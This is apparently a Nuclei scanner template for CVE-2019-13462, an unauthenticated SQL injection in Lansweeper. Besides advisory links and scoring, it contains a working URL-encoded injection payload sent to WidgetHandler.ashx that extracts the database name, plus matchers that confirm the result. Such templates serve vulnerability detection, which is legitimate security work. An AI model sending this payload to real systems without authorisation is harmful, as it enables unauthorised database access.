nuclei-templates/cves/2019/CVE-2019-13462.yaml

43 lines
1.3 KiB
YAML

id: CVE-2019-13462
info:
name: Lansweeper Unauthenticated SQL Injection
author: divya_mudgal
severity: critical
description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection.
reference:
- https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
- https://nvd.nist.gov/vuln/detail/CVE-2019-13462
- https://www.nccgroup.trust/uk/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/
- https://www.lansweeper.com/forum/yaf_topics33_Announcements.aspx
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2019-13462
cwe-id: CWE-89
tags: cve,cve2019,sqli,lansweeper
requests:
- method: GET
path:
- '{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29'
matchers-condition: and
matchers:
- type: word
words:
- "~lansweeperdb~"
part: body
- type: word
words:
- text/plain
part: header
- type: status
status:
- 500
# Enhanced by mp on 2022/03/29